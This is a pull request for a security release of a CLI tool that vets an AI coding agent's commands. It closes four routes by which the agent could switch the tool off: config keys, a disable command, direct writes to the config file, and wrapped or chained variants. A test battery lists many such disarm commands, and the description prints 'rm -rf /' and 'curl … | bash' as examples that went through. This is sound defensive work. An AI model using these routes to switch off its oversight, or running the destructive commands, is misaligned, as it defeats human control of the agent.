### PR TITLE
release: v0.10.3 — gate no longer approves its own disarming (rf-vnxs, rf-r94l)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,13 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+## [0.10.3] - 2026-09-11
+
+### Security
+
+- **Rafter's own security config is a protected class, and four routes to disarming the gate are closed** (rf-vnxs, rf-r94l; reported in the secbolt audit se-8xzc/se-c3us). On published 0.10.1 and 0.10.2 the gate approved its own disarming: `rafter agent config set agent.hooks.enabled false` was rated `low` and ALLOWED, it persisted to `~/.rafter/config.json`, and every later command — including `rm -rf /` and `curl … | bash` — was then allowed. Three steps, no malformed input, only the documented CLI. It defeated the CRITICAL tier, the one no policy, mode or deny-list can override, which made it worse than any bypass 0.10.1 fixed: those each needed a trick, this needed the product's own interface. The match is now structural rather than a string blacklist — resolved exec plus an argv walk over a protected key *namespace*, evaluated on the sanitized text as well as the raw, so `bash -c "rafter agent config set …"` and `echo … | bash` are caught at any argv position. FOUR routes are closed, not one: the three self-disabling keys (`hooks.enabled`, `hooks.secretScan`, `hooks.commandPolicy`), the `agent disable <component>` route, and — because the config is a *file* — the Write/Edit route that needs no CLI at all. `evaluateWrite` now refuses any write inside the rafter config dir, checked before the no-content early return, since a truncating write disarms just as well. Both runtimes.
+- **The approval message no longer advertises a route the gate denies** (rf-r94l). It printed `To configure: rafter agent config set agent.riskLevel minimal`, which this change now hard-blocks — the hook coaching the agent toward a door it would then slam. That line is gone, and the deny message states the real reason: a wrong reason teaches the agent to hunt for a rule whose shape it was never told.
+
 ## [0.10.2] - 2026-09-09
 
 ### Security

--- a/node/package.json
+++ b/node/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@rafter-security/cli",
-  "version": "0.10.2",
+  "version": "0.10.3",
   "type": "module",
   "repository": {
     "type": "git",

--- a/node/resources/rafter-security-skill.md
+++ b/node/resources/rafter-security-skill.md
@@ -1,7 +1,7 @@
 ---
 name: rafter-security
 description: Security toolkit for AI workflows. Use when scanning code or repos for vulnerabilities, auditing third-party skills/MCPs/agent configs before installing, evaluating shell commands before running them, or generating secure design questions for new features. Provides `rafter run` (remote SAST + SCA, needs RAFTER_API_KEY), `rafter secrets` (offline secrets-only), `rafter agent exec --dry-run` (command-risk classification), and `rafter skill review`.
-version: 0.10.2
+version: 0.10.3
 homepage: https://rafter.so
 metadata:
   openclaw:

--- a/node/src/commands/hook/pretool.ts
+++ b/node/src/commands/hook/pretool.ts
@@ -2,7 +2,10 @@ import { Command } from "commander";
 import { CommandInterceptor, CommandEvaluation } from "../../core/command-interceptor.js";
 import { RegexScanner, ScanResult } from "../../scanners/regex-scanner.js";
 import { AuditLogger } from "../../core/audit-logger.js";
+import os from "node:os";
+import { modifiesRafterSecurityConfig } from "../../core/risk-rules.js";
 import { ConfigManager } from "../../core/config-manager.js";
+import { getRafterDir } from "../../core/config-defaults.js";
 import { applySuppressions, Suppression } from "../../core/custom-patterns.js";
 import { resolveHookControl, HookControl } from "../../core/hook-control.js";
 import { collectSuppressions, applyExcludePaths } from "../agent/scan.js";
@@ -78,6 +81,18 @@ const RISK_DESCRIPTIONS: Record<string, string> = {
 
 function formatBlockedMessage(command: string, evaluation: CommandEvaluation): string {
   const cmdDisplay = command.length > 60 ? command.slice(0, 60) + "..." : command;
+  // rf-vnxs: say what actually happened. "irreversible system damage" is the
+  // wrong sentence for a config write, and a wrong reason teaches the agent to
+  // hunt for a way around a rule whose shape it was never told.
+  if (modifiesRafterSecurityConfig(command)) {
+    return (
+      `\u2717 Rafter blocked: ${cmdDisplay}\n` +
+      `  Rule: rafter security configuration is protected (rf-vnxs)\n` +
+      `  Risk: CRITICAL\u2014this command reconfigures or removes rafter's own\n` +
+      `        guardrail. The gate cannot approve its own disarming. A person\n` +
+      `        must make this change outside an agent session.`
+    );
+  }
   const rule = evaluation.matchedPattern ?? "policy violation";
   const label = RISK_LABELS[evaluation.riskLevel] ?? evaluation.riskLevel.toUpperCase();
   const desc = RISK_DESCRIPTIONS[evaluation.riskLevel] ?? "";
@@ -89,7 +104,7 @@ function formatApprovalMessage(command: string, evaluation: CommandEvaluation): 
   const rule = evaluation.matchedPattern ?? "policy match";
   const label = RISK_LABELS[evaluation.riskLevel] ?? evaluation.riskLevel.toUpperCase();
   const desc = RISK_DESCRIPTIONS[evaluation.riskLevel] ?? "";
-  return `\u26a0 Rafter: approval required\n  Command: ${cmdDisplay}\n  Rule: ${rule}\n  Risk: ${label}\u2014${desc}\n\nTo approve: rafter agent exec --approve "${command}"\nTo configure: rafter agent config set agent.riskLevel minimal`;
+  return `\u26a0 Rafter: approval required\n  Command: ${cmdDisplay}\n  Rule: ${rule}\n  Risk: ${label}\u2014${desc}\n\nTo approve: a person must run \`rafter agent exec "${command}"\` at an\n            interactive terminal and confirm. There is no flag that\n            skips the prompt.`;
 }
 
 export function createHookPretoolCommand(): Command {
@@ -253,7 +268,45 @@ function evaluateBash(command: string, control: HookControl): HookDecision {
   return { decision: "allow" };
 }
 
+/**
+ * True if this write targets rafter's own configuration directory.
+ *
+ * rf-vnxs, fourth route. Blocking the CLI invocation is not enough: the config
+ * is a FILE, and an agent holding a Write/Edit tool does not need the CLI to
+ * disable the hook — it can write `~/.rafter/config.json` directly. Three
+ * independent routes to the unblockable tier had already been found one at a
+ * time in this codebase; this is the one that would have been the fourth.
+ */
+function writesRafterSecurityConfig(filePath: string): boolean {
+  if (!filePath) return false;
+  try {
+    const expanded = filePath.startsWith("~")
+      ? path.join(os.homedir(), filePath.slice(1))
+      : filePath;
+    const target = path.resolve(expanded);
+    const rafterDir = path.resolve(getRafterDir());
+    return target === rafterDir || target.startsWith(rafterDir + path.sep);
+  } catch {
+    return false;
+  }
+}
+
 function evaluateWrite(toolInput: Record<string, any>): HookDecision {
+  // rf-vnxs: checked FIRST, and before the no-content early return, because a
+  // truncating write with empty content disables the hook just as well as one
+  // carrying JSON.
+  if (writesRafterSecurityConfig(toolInput.file_path ?? "")) {
+    return {
+      decision: "deny",
+      reason:
+        "\u2717 Rafter blocked: write to rafter's own configuration\n" +
+        "  Rule: rafter security configuration is protected (rf-vnxs)\n" +
+        "  Risk: CRITICAL\u2014editing this file reconfigures or removes the\n" +
+        "        guardrail. The gate cannot approve its own disarming. A\n" +
+        "        person must make this change outside an agent session.",
+    };
+  }
+
   // Write uses "content", Edit uses "new_string"
   const content = toolInput.content || toolInput.new_string || "";
   if (!content) {

--- a/node/src/core/risk-rules.ts
+++ b/node/src/core/risk-rules.ts
@@ -710,7 +710,114 @@ export function sanitizeCommandForMatching(command: string): string {
 /**
  * Assess risk level of a command string.
  */
+/**
+ * rf-vnxs — reconfiguring rafter's OWN security controls is a PROTECTED CLASS.
+ *
+ * The gate must never approve its own disarming. On 0.10.1 it did: the hook
+ * rated `rafter agent config set agent.hooks.enabled false` as `low`, allowed
+ * it, and every later command — including the CRITICAL tier that no policy,
+ * mode or deny-list can override — was then permitted. Three steps, no
+ * malformed command, and it persists to config.json.
+ *
+ * This is matched STRUCTURALLY — resolved exec plus an argv walk — and not by
+ * string, because the spellings are unbounded and were all observed allowed on
+ * the published artifact: extra whitespace, `FALSE`, `npx @rafter-security/cli
+ * …`, `sudo -E rafter …`, the `agent disable` component route, and three
+ * different self-disabling keys (hooks.enabled, hooks.secretScan,
+ * hooks.commandPolicy). A blacklist of one string is one alias away from being
+ * a no-op — the same shape as the CHAIN_OPS one-liner that was proven inert
+ * only by running the shipped module.
+ */
+const RAFTER_EXECS = new Set(["rafter", "rafter-cli"]);
+const PACKAGE_RUNNERS = new Set(["npx", "bunx", "pnpx", "dlx", "pnpm", "yarn", "bun"]);
+const RAFTER_PACKAGE = /^(?:@rafter-security\/cli|rafter-cli|rafter)(?:@[\w.^~*-]+)?$/;
+
+/** Config keys that gate the hook. Namespace, not a leaf — see hook-control. */
+const PROTECTED_CONFIG_KEY = /^(?:agent\.)?(?:hooks|commandpolicy)\b|^agent\.risklevel$/;
+
+/**
+ * True if this statement's argv reconfigures or removes a rafter security
+ * control.
+ *
+ * The rafter invocation is looked for at ANY position, not just as the
+ * statement's own exec, because a shell that carries a command string puts it
+ * in the operand: `bash -c "rafter agent config set agent.hooks.enabled false"`
+ * and `bash -c "$(echo rafter …)"` both sanitize to a statement whose exec is
+ * `bash`, and an exec-only walk reads them — wrongly — as not-rafter. A quoted
+ * word is skipped on the raw pass so that `echo 'rafter agent config set …'`
+ * stays prose; the sanitized pass is where an actually-executed operand has
+ * already been unwrapped for us.
+ */
+function statementDisarmsRafter(words: Piece[]): boolean {
+  for (let j = 0; j < words.length; j++) {
+    if (words[j].quoted) continue;
+    let k = j;
+    let exec = execName(words[k].text);
+    k++;
+
+    // `npx [-y] @rafter-security/cli …`, `pnpm dlx rafter-cli …`, `bunx rafter …`
+    if (PACKAGE_RUNNERS.has(exec)) {
+      while (k < words.length && (words[k].text.startsWith("-") || ["dlx", "exec"].includes(words[k].text.toLowerCase()))) k++;
+      if (k >= words.length || !RAFTER_PACKAGE.test(words[k].text.toLowerCase())) continue;
+      k++;
+      exec = "rafter";
+    }
+    if (!RAFTER_EXECS.has(exec)) continue;
+
+    const args = words.slice(k).map((w) => w.text.toLowerCase()).filter((a) => !a.startsWith("-"));
+    for (let n = 0; n + 1 < args.length; n++) {
+      // `… config set <protected key>` — the key is the next non-flag operand.
+      if (args[n] === "config" && args[n + 1] === "set") {
+        const key = args[n + 2];
+        if (key && PROTECTED_CONFIG_KEY.test(key)) return true;
+      }
+      // `… agent disable <component>` — uninstalls a control outright.
+      if (args[n] === "agent" && args[n + 1] === "disable") return true;
+    }
+  }
+  return false;
+}
+
+/**
+ * True if the command disarms rafter, checked on BOTH the raw text and the
+ * sanitized text. Raw catches the ordinary invocation; sanitized catches the
+ * case where a shell runs the OUTPUT of something else — `bash -c "$(echo
+ * rafter agent config set …)"`, whose own exec is `echo` and which a walk over
+ * the raw argv therefore reads, correctly, as a print. That is the same
+ * executes-output distinction sable-c6an turned on.
+ */
+export function modifiesRafterSecurityConfig(command: string): boolean {
+  if (disarmsRafter(command, 0)) return true;
+  const sanitized = sanitizeCommandForMatching(command);
+  return sanitized !== command && disarmsRafter(sanitized, 0);
+}
+
+/** True if any statement (or any command substitution) disarms rafter. */
+function disarmsRafter(command: string, depth = 0): boolean {
+  if (depth > MAX_SANITIZE_DEPTH) return false;
+  const { pieces } = tokenize(command);
+  let stmt: Piece[] = [];
+  const statements: Piece[][] = [];
+  for (const p of pieces) {
+    if (p.op !== null) {
+      if (CHAIN_OPS.has(p.op) || p.op === "\n" || p.op === "\r") { statements.push(stmt); stmt = []; }
+      continue;
+    }
+    stmt.push(p);
+    for (const sub of p.substs ?? []) {
+      if (disarmsRafter(sub, depth + 1)) return true;
+    }
+  }
+  statements.push(stmt);
+  return statements.some(statementDisarmsRafter);
+}
+
 export function assessCommandRisk(command: string): CommandRiskLevel {
+  // rf-vnxs: checked on the RAW command, before sanitization, because the
+  // disarm is an ordinary well-formed invocation — there is nothing malformed
+  // for the sanitizer to normalise, and redaction could hide the operand.
+  if (modifiesRafterSecurityConfig(command)) return "critical";
+
   const cmd = sanitizeCommandForMatching(command).toLowerCase().trim();
   if (!cmd) return "low";
 
@@ -733,6 +840,9 @@ export function assessCommandRisk(command: string): CommandRiskLevel {
  * built-in rule matched.
  */
 export function matchedCriticalPattern(command: string): string | null {
+  if (modifiesRafterSecurityConfig(command)) {
+    return "rafter security configuration is protected (rf-vnxs)";
+  }
   const cmd = sanitizeCommandForMatching(command).toLowerCase().trim();
   for (const pattern of CRITICAL_PATTERNS) {
     if (pattern.test(cmd)) return pattern.source;

--- a/python/pyproject.toml
+++ b/python/pyproject.toml
@@ -1,6 +1,6 @@
 [tool.poetry]
 name = "rafter-cli"
-version = "0.10.2"
+version = "0.10.3"
 description = "Rafter CLI — the default security agent for AI workflows. Free for individuals and open source."
 authors = ["Rafter Team <hello@rafter.so>"]
 license = "MIT"

--- a/python/rafter_cli/commands/hook.py
+++ b/python/rafter_cli/commands/hook.py
@@ -6,10 +6,12 @@ import math
 import os
 import subprocess
 import sys
+from pathlib import Path
 
 import typer
 
 from ..core.audit_logger import AuditLogger
+from ..core.risk_rules import modifies_rafter_security_config
 from ..core.command_interceptor import CommandInterceptor
 from ..scanners.regex_scanner import RegexScanner
 
@@ -37,6 +39,17 @@ _RISK_DESCRIPTIONS = {
 
 def _format_blocked_message(command: str, evaluation) -> str:
     cmd_display = command[:60] + "..." if len(command) > 60 else command
+    # rf-vnxs: say what actually happened. "irreversible system damage" is the
+    # wrong sentence for a config write, and a wrong reason teaches the agent to
+    # go looking for a way around a rule it was never told the shape of.
+    if modifies_rafter_security_config(command):
+        return (
+            f"\u2717 Rafter blocked: {cmd_display}\n"
+            f"  Rule: rafter security configuration is protected (rf-vnxs)\n"
+            f"  Risk: CRITICAL\u2014this command reconfigures or removes rafter's own\n"
+            f"        guardrail. The gate cannot approve its own disarming. A person\n"
+            f"        must make this change outside an agent session."
+        )
     rule = evaluation.matched_pattern or "policy violation"
     label = _RISK_LABELS.get(evaluation.risk_level, evaluation.risk_level.upper())
     desc = _RISK_DESCRIPTIONS.get(evaluation.risk_level, "")
@@ -54,8 +67,9 @@ def _format_approval_message(command: str, evaluation) -> str:
         f"  Rule: {rule}\n"
         f"  Risk: {label}\u2014{desc}\n"
         f"\n"
-        f'To approve: rafter agent exec --approve "{command}"\n'
-        f"To configure: rafter agent config set agent.riskLevel minimal"
+        f'To approve: a person must run `rafter agent exec "{command}"` at an\n'
+        f"            interactive terminal and confirm. There is no flag that\n"
+        f"            skips the prompt."
     )
 
 
@@ -376,7 +390,43 @@ def _evaluate_bash(command: str, control=None) -> dict:
     return {"decision": "allow"}
 
 
+def _writes_rafter_security_config(file_path: str) -> bool:
+    """True if this write targets rafter's own configuration directory.
+
+    rf-vnxs, fourth route. Blocking the CLI invocation is not enough: the config
+    is a FILE, and an agent with a Write/Edit tool does not need the CLI to
+    disable the hook — it can write ``~/.rafter/config.json`` directly. Three
+    independent routes to the unblockable tier had already been found one at a
+    time in this codebase; this is the one that would have been the fourth.
+    """
+    if not file_path:
+        return False
+    try:
+        from ..core.config_schema import get_rafter_dir
+
+        target = Path(file_path).expanduser().resolve()
+        rafter_dir = get_rafter_dir().expanduser().resolve()
+    except Exception:
+        return False
+    return target == rafter_dir or rafter_dir in target.parents
+
+
 def _evaluate_write(tool_input: dict) -> dict:
+    # rf-vnxs: checked FIRST, and before the no-content early return, because a
+    # truncating write with empty content disables the hook just as well as one
+    # carrying JSON.
+    if _writes_rafter_security_config(tool_input.get("file_path", "")):
+        return {
+            "decision": "deny",
+            "reason": (
+                "\u2717 Rafter blocked: write to rafter's own configuration\n"
+                "  Rule: rafter security configuration is protected (rf-vnxs)\n"
+                "  Risk: CRITICAL\u2014editing this file reconfigures or removes the\n"
+                "        guardrail. The gate cannot approve its own disarming. A\n"
+                "        person must make this change outside an agent session."
+            ),
+        }
+
     content = tool_input.get("content", "") or tool_input.get("new_string", "")
     if not content:
         return {"decision": "allow"}

--- a/python/rafter_cli/core/risk_rules.py
+++ b/python/rafter_cli/core/risk_rules.py
@@ -774,8 +774,106 @@ def sanitize_command_for_matching(command: str) -> str:
     return _sanitize(command, 0)
 
 
+# rf-vnxs — reconfiguring rafter's OWN security controls is a PROTECTED CLASS.
+#
+# The gate must never approve its own disarming. On 0.10.1 it did: the hook
+# rated `rafter agent config set agent.hooks.enabled false` as `low`, allowed
+# it, and every later command — including the CRITICAL tier that no policy,
+# mode or deny-list can override — was then permitted. Three steps, no
+# malformed command, and it persists to config.json.
+#
+# Matched STRUCTURALLY (resolved exec + argv walk), never by string: every one
+# of these was observed ALLOWED on the published artifact — extra whitespace,
+# `FALSE`, `npx @rafter-security/cli …`, `pnpm dlx`, `sudo -E rafter …`, an
+# absolute path, the `agent disable` component route, and three separate
+# self-disabling keys. A blacklist of one string is one alias from being inert.
+_RAFTER_EXECS = {"rafter", "rafter-cli"}
+_PACKAGE_RUNNERS = {"npx", "bunx", "pnpx", "dlx", "pnpm", "yarn", "bun"}
+_RAFTER_PACKAGE = re.compile(r"^(?:@rafter-security/cli|rafter-cli|rafter)(?:@[\w.^~*-]+)?$")
+
+# Config keys that gate the hook. A namespace, not a leaf — see hook_control.
+_PROTECTED_CONFIG_KEY = re.compile(r"^(?:agent\.)?(?:hooks|commandpolicy)\b|^agent\.risklevel$")
+
+
+def _statement_disarms_rafter(words: list[_Piece]) -> bool:
+    """True if this statement's argv reconfigures or removes a rafter control.
+
+    The rafter invocation is looked for at ANY position, not just as the
+    statement's own exec: a shell carrying a command string puts it in the
+    operand, so `bash -c "rafter agent config set …"` and `bash -c "$(echo
+    rafter …)"` both reduce to a statement whose exec is `bash`. A quoted word
+    is skipped on the raw pass so `echo 'rafter agent config set …'` stays
+    prose; the sanitized pass sees operands that are actually executed already
+    unwrapped.
+    """
+    for j in range(len(words)):
+        if words[j].quoted:
+            continue
+        k = j
+        exec_ = _exec_name(words[k].text)
+        k += 1
+
+        if exec_ in _PACKAGE_RUNNERS:
+            while k < len(words) and (words[k].text.startswith("-") or words[k].text.lower() in ("dlx", "exec")):
+                k += 1
+            if k >= len(words) or not _RAFTER_PACKAGE.match(words[k].text.lower()):
+                continue
+            k += 1
+            exec_ = "rafter"
+        if exec_ not in _RAFTER_EXECS:
+            continue
+
+        args = [w.text.lower() for w in words[k:] if not w.text.startswith("-")]
+        for n in range(len(args) - 1):
+            if args[n] == "config" and args[n + 1] == "set":
+                key = args[n + 2] if n + 2 < len(args) else None
+                if key and _PROTECTED_CONFIG_KEY.match(key):
+                    return True
+            if args[n] == "agent" and args[n + 1] == "disable":
+                return True
+    return False
+
+
+def _disarms_rafter(command: str, depth: int = 0) -> bool:
+    """True if any statement (or command substitution) disarms rafter."""
+    if depth > _MAX_SANITIZE_DEPTH:
+        return False
+    pieces, _ = _tokenize(command)
+    statements: list[list[_Piece]] = []
+    stmt: list[_Piece] = []
+    for p in pieces:
+        if p.op is not None:
+            if p.op in _CHAIN_OPS or p.op in ("\n", "\r"):
+                statements.append(stmt)
+                stmt = []
+            continue
+        stmt.append(p)
+        for sub in (p.substs or []):
+            if _disarms_rafter(sub, depth + 1):
+                return True
+    statements.append(stmt)
+    return any(_statement_disarms_rafter(st) for st in statements)
+
+
+def modifies_rafter_security_config(command: str) -> bool:
+    """True if the command disarms rafter, checked on raw AND sanitized text.
+
+    Raw catches the ordinary invocation; sanitized catches a shell running the
+    OUTPUT of something else, whose own exec is `echo` and which a walk over
+    the raw argv therefore reads, correctly, as a print.
+    """
+    if _disarms_rafter(command):
+        return True
+    sanitized = sanitize_command_for_matching(command)
+    return sanitized != command and _disarms_rafter(sanitized)
+
+
 def assess_command_risk(command: str) -> str:
     """Assess risk level of a command string."""
+    # rf-vnxs: checked before the pattern loops. The disarm is an ordinary
+    # well-formed invocation — nothing malformed for the sanitizer to normalise.
+    if modifies_rafter_security_config(command):
+        return "critical"
     cmd = sanitize_command_for_matching(command).strip()
     if not cmd:
         return "low"

--- a/python/rafter_cli/resources/rafter-security-skill.md
+++ b/python/rafter_cli/resources/rafter-security-skill.md
@@ -1,7 +1,7 @@
 ---
 name: rafter-security
 description: Security toolkit for AI workflows. Use when scanning code or repos for vulnerabilities, auditing third-party skills/MCPs/agent configs before installing, evaluating shell commands before running them, or generating secure design questions for new features. Provides `rafter run` (remote SAST + SCA, needs RAFTER_API_KEY), `rafter secrets` (offline secrets-only), `rafter agent exec --dry-run` (command-risk classification), and `rafter skill review`.
-version: 0.10.2
+version: 0.10.3
 homepage: https://rafter.so
 metadata:
   openclaw:

--- a/rf-6pqx-newline-heredoc-battery.json
+++ b/rf-6pqx-newline-heredoc-battery.json
@@ -311,5 +311,186 @@
     "want": [
       "low"
     ]
+  },
+  {
+    "label": "vnxs disarm: plain disable",
+    "cmd": "rafter agent config set agent.hooks.enabled false",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: sub-part secretScan",
+    "cmd": "rafter agent config set agent.hooks.secretScan false",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: sub-part commandPolicy",
+    "cmd": "rafter agent config set agent.hooks.commandPolicy false",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: extra whitespace",
+    "cmd": "rafter agent config set   agent.hooks.enabled   false",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: uppercase value",
+    "cmd": "rafter agent config set agent.hooks.enabled FALSE",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: npx package runner",
+    "cmd": "npx @rafter-security/cli agent config set agent.hooks.enabled false",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: npx -y + version pin",
+    "cmd": "npx -y @rafter-security/cli@0.10.1 agent config set agent.hooks.enabled false",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: pnpm dlx",
+    "cmd": "pnpm dlx rafter-cli agent config set agent.hooks.enabled false",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: sudo -E wrapper",
+    "cmd": "sudo -E rafter agent config set agent.hooks.enabled false",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: env assignment prefix",
+    "cmd": "FOO=1 rafter agent config set agent.hooks.enabled false",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: absolute path exec",
+    "cmd": "/usr/local/bin/rafter agent config set agent.hooks.enabled false",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: --global flag",
+    "cmd": "rafter agent config set agent.hooks.enabled false --global",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: component uninstall",
+    "cmd": "rafter agent disable claude-code",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: chained after benign",
+    "cmd": "echo hi && rafter agent config set agent.hooks.enabled false",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: chained on a newline",
+    "cmd": "echo hi\nrafter agent config set agent.hooks.enabled false",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: inside a substitution",
+    "cmd": "bash -c \"$(echo rafter agent config set agent.hooks.enabled false)\"",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: shell -c carries it",
+    "cmd": "bash -c \"rafter agent config set agent.hooks.enabled false\"",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: piped into a shell",
+    "cmd": "echo rafter agent config set agent.hooks.enabled false | bash",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs disarm: ssh remote disarm",
+    "cmd": "ssh host \"rafter agent config set agent.hooks.enabled false\"",
+    "want": [
+      "critical"
+    ]
+  },
+  {
+    "label": "vnxs guard: read-only show",
+    "cmd": "rafter agent config show",
+    "want": [
+      "low",
+      "medium"
+    ]
+  },
+  {
+    "label": "vnxs guard: read-only get",
+    "cmd": "rafter agent config get agent.hooks.enabled",
+    "want": [
+      "low",
+      "medium"
+    ]
+  },
+  {
+    "label": "vnxs guard: unrelated key",
+    "cmd": "rafter agent config set backend.endpoint https://x/",
+    "want": [
+      "low",
+      "medium"
+    ]
+  },
+  {
+    "label": "vnxs guard: a different CLI entirely",
+    "cmd": "git config set user.name bob",
+    "want": [
+      "low",
+      "medium"
+    ]
+  },
+  {
+    "label": "vnxs guard: prose mentioning it",
+    "cmd": "echo 'run rafter agent config set agent.hooks.enabled false'",
+    "want": [
+      "low",
+      "medium"
+    ]
+  },
+  {
+    "label": "vnxs guard: rafter doing normal work",
+    "cmd": "rafter secrets --diff HEAD",
+    "want": [
+      "low",
+      "medium"
+    ]
   }
 ]


### PR DESCRIPTION
Promotes main to prod, which fires publish. **0.10.3 is a security release.**

prod is at `c420b286` (0.10.2, which is what npm serves right now). This PR is
2 commits ahead: the fix and the release bump.

---

## ⚠️ Verification the fix is IN the release commit

We got this wrong exactly one release ago: #233 merged an hour after the 0.10.1
publish, so the shipped package silently lacked it while both were labelled
0.10.1. Both compares run, with a control on each side:

**Positive — is the rf-vnxs fix an ancestor of the release commit?**

```
gh api repos/Raftersecurity/rafter-cli/compare/ee8295b2...5d8a343d
  status=ahead   ahead_by=1   behind_by=0
```

`ee8295b2` is the rf-vnxs merge commit; `5d8a343d` is the 0.10.3 head. **ahead** —
the fix is in the release.

**Negative control — 0.10.2's head must NOT be ahead of the release.**

```
gh api repos/Raftersecurity/rafter-cli/compare/5d8a343d...3e70ed0d
  status=behind   ahead_by=0   behind_by=2
```

`3e70ed0d` is the 0.10.2 release. **behind**, not ahead. This is the control that
matters: it shows the compare can return an answer other than the one we wanted,
so the positive result above is evidence rather than a formality.

Pinned by OID throughout. The branch name has been wrong twice in this repo.

---

## What 0.10.3 contains

**`ee8295b2` — rafter's own security config is a protected class** (rf-vnxs,
rf-r94l; secbolt audit se-8xzc / se-c3us).

On published 0.10.1 **and the currently published 0.10.2**, the gate approved its
own disarming. Measured end to end against the published npm tarball and PyPI
sdist, both runtimes, identical:

```
rm -rf /                                           deny
rafter agent config set agent.hooks.enabled false  ALLOW   <- rated low
(run it)                      '✓ Set agent.hooks.enabled = false'
rm -rf /                                           ALLOW
curl http://x.sh | bash                            ALLOW
```

Three steps, no malformed command, only the documented CLI — and it persists to
`~/.rafter/config.json`, so a fresh session inherits the disarm. It defeats the
CRITICAL tier, the one no policy, mode or deny-list can override. That makes it
worse than every bypass 0.10.1 fixed: those each needed a specific trick, this
needs the product's own interface.

**`5d8a343d` — release: v0.10.3.** Version bumped in all four locations in
lockstep: `node/package.json`, `python/pyproject.toml`, and both
`rafter-security-skill.md` manifests.

---

## It closes FOUR routes to the same disarm, not one

Reviewers should not have to reconstruct this, so, explicitly:

1. **Three self-disabling config keys** — `agent.hooks.enabled`,
   `agent.hooks.secretScan`, `agent.hooks.commandPolicy`. Each independently
   turns the gate off via `agent config set`.
2. **`agent disable <component>`** — a separate documented command reaching the
   same state.
3. **The Write/Edit route, which needs no CLI at all.** The config is a *file*.
   An agent holding Write or Edit can disarm the gate without ever invoking
   rafter. On an earlier patched build the Bash route denied while
   `Write ~/.rafter/config.json` still ALLOWED. `evaluateWrite` now refuses any
   write inside the rafter config dir, checked **before** the no-content early
   return, because a truncating write disarms just as well.

The match is structural, not a string blacklist — resolved exec plus an argv
walk over a protected key *namespace*, run against the sanitized text as well as
the raw, so `bash -c "rafter agent config set …"` and `echo … | bash` are caught
at any argv position. A one-string fix would have been a no-op: whitespace,
`FALSE`, `npx`, `pnpm dlx`, `sudo -E`, an absolute path, `FOO=1 rafter …` and
`--global` were each verified ALLOWED on the published artifact.

`rf-r94l` rides along because this fix made it incoherent: the approval message
printed `To configure: rafter agent config set agent.riskLevel minimal`, which
the same change now hard-blocks — the hook advertising a route it would then
deny. That line is gone, and the deny message states the real reason.

---

## Deliberately NOT in this release

The command-policy allowlist (`b3ba56d` + `4f94eaf`) is **excluded**. Those two
commits are Node-only — zero Python files between them — while `4f94eaf` also
documents the key in `shared-docs/CLI_SPEC.md`. Landing them would ship a
documented feature that one runtime does not implement, which the
dual-implementation rule forbids. Writing the Python half is not a cleanup; it
is implementing half a feature in the command-policy path under release
pressure. rf-vnxs is a live CRITICAL bypass in the published package and does
not wait for a feature request.

---

## After merge

Merging this fires publish. Verify the **artifact**, not the workflow exit code:

```
npm view @rafter-security/cli version     # must read 0.10.3
```

then re-run the classifier cases against the published tarball. A publish job
that exits 0 is not a version that shipped.
